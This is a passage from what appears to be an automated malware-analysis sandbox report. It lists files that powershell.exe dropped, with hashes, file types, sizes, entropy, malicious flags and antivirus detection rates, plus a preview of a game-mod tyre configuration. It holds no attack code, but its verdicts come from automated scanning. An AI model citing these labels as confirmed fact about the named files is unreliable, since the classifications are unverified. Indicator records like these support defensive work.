                                                                                                                                                          SSDEEP:24576:HO51NG2bq1mhQpCR4SSUVxiKZiva+su3pUlSuMEFR+PoT0lqU:34hQoRpSUVYKZqvsu3pUlNMEePoT0E
                                                                                                                                                          MD5:C24C89879410889DF656E3A961C59BCC
                                                                                                                                                          SHA1:25A9E4E545E86B0A5FE14EE0147746667892FABD
                                                                                                                                                          SHA-256:739BEDCFC8EB860927EB2057474BE5B39518AAAA6703F9F85307A432FA1F236E
                                                                                                                                                          SHA-512:0542C431049E4FD40619579062D206396BEF2F6DADADBF9294619C918B9E6C96634DCD404B78C6045974295126EC35DD842C6EC8F42279D9598B57A751CD0034
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5644904
                                                                                                                                                          Entropy (8bit):6.473386186229144
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:o/zx+riUDpJowboU+XEsumY2XW6jBYeZ1ER:2x+riUDwUj12X1tY5
                                                                                                                                                          MD5:AD2735F096925010A53450CB4178C89E
                                                                                                                                                          SHA1:C6D65163C6315A642664F4EAEC0FAE9528549BFE
                                                                                                                                                          SHA-256:4E775B5FAFB4E6D89A4694F8694D2B8B540534BD4A52FF42F70095F1C929160E
                                                                                                                                                          SHA-512:1868B22A7C5CBA89545B06F010C09C5418B3D86039099D681EEE9567C47208FDBA3B89C6251CF03C964C58C805280D45BA9C3533125F6BD3E0BC067477E03AB9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):373656
                                                                                                                                                          Entropy (8bit):5.747099794440249
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:rbT9vTZFNSlIbVf7o3Cyi7igb/Js0S6uZZspiDbZHNjWOnNxFiKey1ISQlXflY:fRvNvvbhOq7F3S/qpiDlNCONvmXdY
                                                                                                                                                          MD5:14934CACA84D5FE0288F27EFB31DCBF8
                                                                                                                                                          SHA1:98C8C659488A5782679112E0FFB089422A664AC5
                                                                                                                                                          SHA-256:7FA86147035627BAE39576BCBE619D045E94A48C4DB8CA131968C20BB4DE4A36
                                                                                                                                                          SHA-512:9A239132A46FE578FA04FF727D8C28F9E1D179E7154619670A22A403819F337AF0A96EBD7081D04D53910A12BBDC548B3CD2B2A285931C92F1C149AD5D846A6A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):23966
                                                                                                                                                          Entropy (8bit):5.51352959157031
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:vp7uhvldPVDiktgppK0deSS88H69o67ZkZxDJoeHDsqfKtXZqhSbpKafCQN3dMsd:x69ldN+ugppK0d1S7HB6lSxDSe0tXZq+
                                                                                                                                                          MD5:D3DBC9E34960169C38554935FEE7E2A5
                                                                                                                                                          SHA1:B0EE82E4293ED4237A0D9ECD90EB91B99694F6B6
                                                                                                                                                          SHA-256:86C72C5EE6DE1DFCC3ED7E52A39DD2692B00C4EBF966B30A94F12C18BEDE0377
                                                                                                                                                          SHA-512:7509D56A0A4F33CE39724C38AB926C113C01D6BCF314F3F4E62513AC43AC1274A34B62AB6063B0F0C0DB8AFD2D1BA6578F6F873BAC4A9E9D0644A890B0EC49EC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2849280
                                                                                                                                                          Entropy (8bit):5.898395689897465
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:KlOh5PuX2I9Rkf5gnQ7duzGuqFCtLQ2IqNPz38JQ41CPwDv3uFfJ:Q2Irkn2Iqt38C41CPwDv3uFfJ
                                                                                                                                                          MD5:28DEA3E780552EB5C53B3B9B1F556628
                                                                                                                                                          SHA1:55DCCD5B30CE0363E8EBDFEB1CCA38D1289748B8
                                                                                                                                                          SHA-256:52415829D85C06DF8724A3D3D00C98F12BEABF5D6F3CBAD919EC8000841A86E8
                                                                                                                                                          SHA-512:19DFE5F71901E43EA34D257F693AE1A36433DBDBCD7C9440D9B0F9EEA24DE65C4A8FE332F7B88144E1A719A6BA791C2048B4DD3E5B1ED0FDD4C813603AD35112
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):685056
                                                                                                                                                          Entropy (8bit):5.49393422013168
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:PcPPRr7K55yAAKDNkk1+cFc+CmRkS9/+wDe1rlXiE4D9u3AG3UQjA5WU2lvz:2N43+cFcmYhXixo7708U2lvz
                                                                                                                                                          MD5:4AD03043A32E9A1EF64115FC1ACE5787
                                                                                                                                                          SHA1:352E0E3A628C8626CFF7EED348221E889F6A25C4
                                                                                                                                                          SHA-256:A0E43CBC4A2D8D39F225ABD91980001B7B2B5001E8B2B8292537AE39B17B85D1
                                                                                                                                                          SHA-512:EDFAE3660A5F19A9DEDA0375EFBA7261D211A74F1D8B6BF1A8440FED4619C4B747ACA8301D221FD91230E7AF1DAB73123707CC6EDA90E53EB8B6B80872689BA6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):578384
                                                                                                                                                          Entropy (8bit):6.524580849411757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:RBSNvy11qsslnxU/1ceqHiNHlOp/2M+UHHZpDLO+r2VhQEKZm+jWodEEVAdm:RBSDOFQEKZm+jWodEE2dm
                                                                                                                                                          MD5:1BA6D1CF0508775096F9E121A24E5863
                                                                                                                                                          SHA1:DF552810D779476610DA3C8B956CC921ED6C91AE
                                                                                                                                                          SHA-256:74892D9B4028C05DEBAF0B9B5D9DC6D22F7956FA7D7EEE00C681318C26792823
                                                                                                                                                          SHA-512:9887D9F5838AA1555EA87968E014EDFE2F7747F138F1B551D1F609BC1D5D8214A5FDAB0D76FCAC98864C1DA5EB81405CA373B2A30CB12203C011D89EA6D069AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35704
                                                                                                                                                          Entropy (8bit):6.591016227549893
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:z1vZLMtUYqOoKFYpWcm5gW/ki0pSt+eB+Hj+R9zUkUTRtHRN7SoHR9zui5TJ:zpCtzqOjKYWi0QKHji9zSRtnx9zJTJ
                                                                                                                                                          MD5:69D96E09A54FBC5CF92A0E084AB33856
                                                                                                                                                          SHA1:B4629D51B5C4D8D78CCB3370B40A850F735B8949
                                                                                                                                                          SHA-256:A3A1199DE32BBBC8318EC33E2E1CE556247D012851E4B367FE853A51E74CE4EE
                                                                                                                                                          SHA-512:2087827137C473CDBEC87789361ED34FAD88C9FE80EF86B54E72AEA891D91AF50B17B7A603F9AE2060B3089CE9966FAD6D7FBE22DEE980C07ED491A75503F2CF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18578896
                                                                                                                                                          Entropy (8bit):6.451339218330448
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:393216:PXhbUNnoBP98OQ//aXUszfTBHCOUZ2UenCDkOH2:PXhNB4nlW
                                                                                                                                                          MD5:0A84667145E7EFEF026C888D4B768126
                                                                                                                                                          SHA1:27673E1BD7C55BBA6EAA37620D3B3820CE45D46A
                                                                                                                                                          SHA-256:DD575F3C64382193610815909BD2C52490244ECBBB9BBA6EEF5FE4F0BB43BB4D
                                                                                                                                                          SHA-512:3E964C996ED358787C4DFDB965A00B38B4118C804AE1BF8D32AEB7D936584E72C188E3FA0D27D1C2FFD3BE13DCA8045B08B28B15070812C195D82D1BF23A2604
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):806258
                                                                                                                                                          Entropy (8bit):7.867340280444731
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:fAgXTn9UMGNIdYP3lxAvcQrqUr85Bk9/VGzxhQ:ffLFyxdBKgznQ
                                                                                                                                                          MD5:38BE7366796E12E9DDAD7B3F244B401B
                                                                                                                                                          SHA1:59C6000B886D831E88BFA80DAC222B03FBF3F193
                                                                                                                                                          SHA-256:CBAD28D0A414B7C247CBF2891BF5FC3CA7939DDC74A4AE0E4C623AD3604C8A8D
                                                                                                                                                          SHA-512:810056EB3FC5F2021561A0B79543E893595E89444B8EC62F9AA1C67393548733645E7DA93F102D2CF203ABC1622CEA9C879DB5D06CFF71A497C3339001B99F9E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):298384
                                                                                                                                                          Entropy (8bit):6.4905956879024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:504VEQ2u/niy9UVLCe9ZqdrP+VXvv+sJYB2RHKBi65lhTbCc+hnvvEyP7yq+uei1:QZu/i874ZcrMv2cRh7yqO2CPLHxYq8/B
                                                                                                                                                          MD5:6B4AB6E60364C55F18A56A39021B74A6
                                                                                                                                                          SHA1:39CAC2889D8CA497EE0D8434FC9F6966F18FA336
                                                                                                                                                          SHA-256:1DB3FD414039D3E5815A5721925DD2E0A3A9F2549603C6CAB7C49B84966A1AF3
                                                                                                                                                          SHA-512:C08DE8C6E331D13DFE868AB340E41552FC49123A9F782A5A63B95795D5D979E68B5A6AB171153978679C0791DC3E3809C883471A05864041CE60B240CCDD4C21
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):442680
                                                                                                                                                          Entropy (8bit):6.511186357677561
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:9S4bS5XFvti0A0YqsAtMZDeJmdzh8KL5g3AepeV2fbRahYzUM3:9SMCXFFe0YqsAtEeJKCqN2jRahYp
                                                                                                                                                          MD5:9E82E3B658393BED3F7E4F090DF1FBE7
                                                                                                                                                          SHA1:BFFF954B8EF192C01AF9FB5D9141A21279CB9C31
                                                                                                                                                          SHA-256:C2AD5BD189DF04B39BE18DEC5CD251CF79B066010706AD26D99DF7E49FD07762
                                                                                                                                                          SHA-512:DE6A1E62D4E33F807D9C04F355A762717EEDBCF540E747A97BA824871D4A1F144F4929141DF333711D42AF01E441DBBCECBB25A6A4F8EC073A024D94197B776B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10077
                                                                                                                                                          Entropy (8bit):4.973640153352507
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:oqCaCVsP1MQzeRO11bvR2hpg6iYRkX+DHj5jkZU3KAg/sVfKPPfYqlwvR:9bf1MQzeRA1TR2hpg6iY+X+SuaAg+zqW
                                                                                                                                                          MD5:47F6571C7884DA6C743551AC724186D4
                                                                                                                                                          SHA1:C338CE7D292C78F420876332DE93684102EC04AC
                                                                                                                                                          SHA-256:894D3C57598ECB22C769CC3EA8219859A95E22740E72394A474012EA2119B3D9
                                                                                                                                                          SHA-512:5CF57F3F2C53FCBEDF44CD2C896008C41607D7583045E37B819DA1B1D3CE26073802E73FAB74EA6DEF035F11A256D9F0D11A87991CEA14EF5BAF67BDA21D6E20
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:README=Insert your mod's data in mod_tyres.ini....[abarth500]..ST=Street..SM=Semislicks....[abarth500_s1]..ST=Street..SM=Semislicks....[alfa_romeo_giulietta_qv]..ST=Street....[alfa_romeo_giulietta_qv_le]..ST=Street....[bmw_1m]..ST=Street..SM=Semislicks....[bmw_1m_s3]..ST=Street..SM=Semislicks....[bmw_m3_e30]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e30_drift]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e30_dtm]..S=Slicks Soft DTM90s..M=Slicks Medium DTM90s..H=Slicks Hard DTM90s....[bmw_m3_e30_gra]..S=Slicks Soft DTM90s..M=Slicks Medium DTM90s..H=Slicks Hard DTM90s....[bmw_m3_e30_s1]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e92]..ST=Street..SM=Semislicks....[bmw_m3_e92_drift]..ST=Street..SM=Semislicks....[bmw_m3_e92_s1]..ST=Street..SM=Semislicks....[bmw_m3_gt2]..SS=Slick SuperSoft..S=Slick Soft..M=Slick Medium..H=Slick Hard..SH=Slick SuperHard....[bmw_z4]..ST=Street..SM=Semislicks....[bmw_z4_drift]..ST=Street..SM=Semislicks....[bmw_z4_gt3]..S=Slick Soft..M=Sli
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):109440
                                                                                                                                                          Entropy (8bit):6.642252418996898
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
                                                                                                                                                          MD5:49C96CECDA5C6C660A107D378FDFC3D4
                                                                                                                                                          SHA1:00149B7A66723E3F0310F139489FE172F818CA8E
                                                                                                                                                          SHA-256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
                                                                                                                                                          SHA-512:E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):49560
                                                                                                                                                          Entropy (8bit):6.6649899041961875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:a0Q4HUcGJZekJSam1BbuBSYcCZbiLzlSHji9z4GwZHji9znwT:afnDex5izbiLzlE+z4Gwl+zwT
                                                                                                                                                          MD5:CF0A1C4776FFE23ADA5E570FC36E39FE
                                                                                                                                                          SHA1:2050FADECC11550AD9BDE0B542BCF87E19D37F1A
                                                                                                                                                          SHA-256:6FD366A691ED68430BCD0A3DE3D8D19A0CB2102952BFC140BBEF4354ED082C47
                                                                                                                                                          SHA-512:D95CD98D22CA048D0FC5BCA551C9DB13D6FA705F6AF120BBBB621CF2B30284BFDC7320D0A819BB26DAB1E0A46253CC311A370BED4EF72ECB60C69791ED720168
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1081320
                                                                                                                                                          Entropy (8bit):6.564787951526749
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:k0Rdvjw14ZCWQuTs54Qbz27j7BS2Nv+4BT8+u60:BDZ2zAj7pXT3i
                                                                                                                                                          MD5:40B9628354EF4E6EF3C87934575545F4
                                                                                                                                                          SHA1:8FB5DA182DEA64C842953BF72FC573A74ADAA155
                                                                                                                                                          SHA-256:372B14FCE2EB35B264F6D4AEEF7987DA56D951D3A09EF866CF55ED72763CAA12
                                                                                                                                                          SHA-512:02B0EA82EFBFBE2E7308F86BFBEC7A5109F3FE91D42731812D2E46AEBEDCE50AABC565D2DA9D3FBCD0F46FEBBFF49C534419D1A91E0C14D5A80F06B74888C641
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12108
                                                                                                                                                          Entropy (8bit):6.288980552421208
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:hQybRAKeTbBNJQy9icUy0VbOAMOrK89Iy7vgE1zq78yEIgk6kh:hDbyKIBnQ+UdVTRZvgEJYqkRh
                                                                                                                                                          MD5:16A30926E4EBC495D3659854C3731F63
                                                                                                                                                          SHA1:2B46D1EE4F0B9C6B184AAD6D9A246745B3B4163C
                                                                                                                                                          SHA-256:DC260B93C358E10FC6F74C0B9F487DD0C2FD58E791EC5B0925B0546258923B36
                                                                                                                                                          SHA-512:04A4893E068A6BCBEC340398868B37ADCF8D41580B2E6EB7A5CD30396A14ACD401E67CFBB0E3ED05FA31601CB0261B82DF2A4D9A3713DB7E39C61C7FB64EA71F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1511802
                                                                                                                                                          Entropy (8bit):7.85439524691317
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:qlHJgwSq7bfCao4XM7+jjA29WG6sCc5dk3U/sR6G38DoouqJlGzqBAR2M:qlHJi+bfu4sAjZWG6sCc/kR5MEZqFBAP
                                                                                                                                                          MD5:99083617F7139EE9AD5D6B719286AC3A
                                                                                                                                                          SHA1:78AF90E2BF04D41A9839526B00630D439FECAFE0
                                                                                                                                                          SHA-256:7CDDF32DE8B02B3ECF42C50DED8593770C5AB96D76247155F28D1D3CC87A541F
                                                                                                                                                          SHA-512:A54EF634F43190FCF83EB1967B55E3E90A310C48ED0C8350DE86A92BE623F5502AB335E7A70CDFA8F126B3570B164781CFB625679741E6224976726655BF35AB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):176888
                                                                                                                                                          Entropy (8bit):6.464800332254017
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:mZ6EqHx7iXIb/WmRJKn9llPMBq4tNyupwPU0sG0:mZ6E+x7iYiiMn9llP8q4tNyuusc0
                                                                                                                                                          MD5:96214B94B796BFFC48D63289854AE5A2
                                                                                                                                                          SHA1:383BDE4B3A861D47794AA4F03479A48C10A644DD
                                                                                                                                                          SHA-256:528C416CFB4813EE5F1DA52743EF4ADB20043171230098B27E25D1DD90E3F288
                                                                                                                                                          SHA-512:5243DD7153793AE33C3A25F2A92579C4E31813545680DE9A0ABAB36E61D42655DB4796A6F47606B47D6DCE0D3F47754FD29FBFD18B973B029DF0C543915750F3
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2673912
                                                                                                                                                          Entropy (8bit):6.903320844778949
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:hDWA3C12sNU/wEz2tMEjv9DZWtxfc1lVG3QNVBAUZLYasUpGaXBuQQ9umM:t3O2wEz2tMEj1lWtOrVG3QNVBAUZLX/
                                                                                                                                                          MD5:E25413BB41C2F239FFDD3569F76E74B0
                                                                                                                                                          SHA1:073E2A86C5C24EDE4C4AD2D8614261121A8D2661
                                                                                                                                                          SHA-256:9126D9ABF91585456000FFFD9336478E91B9EA07ED2A25806A4E2E0437F96D29
                                                                                                                                                          SHA-512:37B8339555DCF825A2E27464EB1D101F8E4B56460D1B78161E99BA6761F1A967668F11BA888A712C878D468F419A455DBC5E8E55E7FB9D4FBC87CB78F500EA9F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1277496
                                                                                                                                                          Entropy (8bit):6.693734264633346
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:4pPfSOTjS+katpqQTutqG3kGP7NS0LdbiAJ:4VnTu+kNQqqG3kIE0Ldb3J
                                                                                                                                                          MD5:9A7234078559093E06C9D32148ED95A3
                                                                                                                                                          SHA1:40361DAD15B9B5AE2757A21D1CE6A61C3C37E891
                                                                                                                                                          SHA-256:32F5D0A454C26E8AA6F4CAD58F3782337CC97CFE2305BBFE564437E5F0D51BBC
                                                                                                                                                          SHA-512:9A2C3761D799999A691CD605F11C4014F604AFA9A46B3B4C9999EEF177F0E703CA2ED52C22824CBA613559CE37BD134C566D54A4E51141828816B02A4F3DA05B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1953336
                                                                                                                                                          Entropy (8bit):6.308277402923281
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:3nn521M2+LQvsrfqPmckkcltu9Wl0iY9Cu4biY7DvCQ4Rze4:3n521M12cPY9Cu4j7WQ4Rzz
                                                                                                                                                          MD5:5421D49C2B1EABCBF9FC3CD5B3A4A7D2
                                                                                                                                                          SHA1:0028EDCEB5BE4FD315B460B37F499667564A1367
                                                                                                                                                          SHA-256:F555D9A75AFF39EA48A8C51A833833F7892060A3421C57546640BD560E87E67B
                                                                                                                                                          SHA-512:92AD7321A80D3E718E0C625BDF6D4FB122BC661E6B955744D513F043FD7733E39E13AB7A994A4BB140EEC3C1B3D72DDDDD9DC12D98A83811BBF1AB2266946E20
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6013680
                                                                                                                                                          Entropy (8bit):6.4465681348803185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:XMZDDtZO0oV8BPKzv694e7rnSmRw6DKnByzYC3rkOmcdbzKgZI9cji115OVcrDom:cno0w8BPW694evnSmG6oY013S26vCL4M
                                                                                                                                                          MD5:C4C176F948AAEFDBAC2007BE7540F807
                                                                                                                                                          SHA1:FAB53FEA6BF9B66EDF37C05F96D0113E7B3FF151
                                                                                                                                                          SHA-256:B7CE745085DA1EA321BA210178F90C7FBDA7419A64452A887219B6FDC7EF762C
                                                                                                                                                          SHA-512:F0883C2F65189A9992AF98FC05947DF34A43740D4C22196A2D3922EDFE7E4FB2BCD75226A24B9482D2BE5961EEB63A015A329A3A524F25D7E8C6ACBA31AB80BF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8034544
                                                                                                                                                          Entropy (8bit):6.075853444565613
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:EpBqTfDVWxBameIwNZP81iXc6WOptqQbFYdzyCs7Cqy1mZ1PVJLnbd1AYLik7J3g:QE7kBvoXZgx+JLbdXxiflHsvhq75b5
                                                                                                                                                          MD5:0A86F2E157F36783F412379B8B94A1A6
                                                                                                                                                          SHA1:F679118D538D8C0AAB0D8693F8B9B86BC9CCEF2E
                                                                                                                                                          SHA-256:27056202300C852631354871960619AD713BAF02F06D080AFB1CCABA3CE6BC69
                                                                                                                                                          SHA-512:EA8101C2C5DFE11859CFC3539A82B66692920AEC8FBE8D64EE5A32475247F71CA98482E8C20B297811FF3D235738E9C20ACE33142E4833162068CB1F67C523BF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):676928
                                                                                                                                                          Entropy (8bit):6.024055449466699
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:iMuijXEeWt742E+F94FQoS+LZjXEmItnl9:HukEeWtEQr4Fi+LxEmItl9
                                                                                                                                                          MD5:91ACF072FE60B3EF9867FAEC1A7A8CB0
                                                                                                                                                          SHA1:F5BEEE29187C4573ACBF5A9105B6B475B6565F61
                                                                                                                                                          SHA-256:1F49ADC807A564E7C1ECF32F58074A1230A6FE4764E8F54CE7FFA8C2E880DCCA
                                                                                                                                                          SHA-512:6E096399E0AFEB7C5F1A2A60204B887E946B3B6BC926FC5A78A97592A202954EC5E83ECECC3AB1F66A2343DB10C2974C15462837DF342B0C5F6AD4594BD21B37
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):442680
                                                                                                                                                          Entropy (8bit):6.511186357677561
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:9S4bS5XFvti0A0YqsAtMZDeJmdzh8KL5g3AepeV2fbRahYzUM3:9SMCXFFe0YqsAtEeJKCqN2jRahYp
                                                                                                                                                          MD5:9E82E3B658393BED3F7E4F090DF1FBE7
                                                                                                                                                          SHA1:BFFF954B8EF192C01AF9FB5D9141A21279CB9C31
                                                                                                                                                          SHA-256:C2AD5BD189DF04B39BE18DEC5CD251CF79B066010706AD26D99DF7E49FD07762
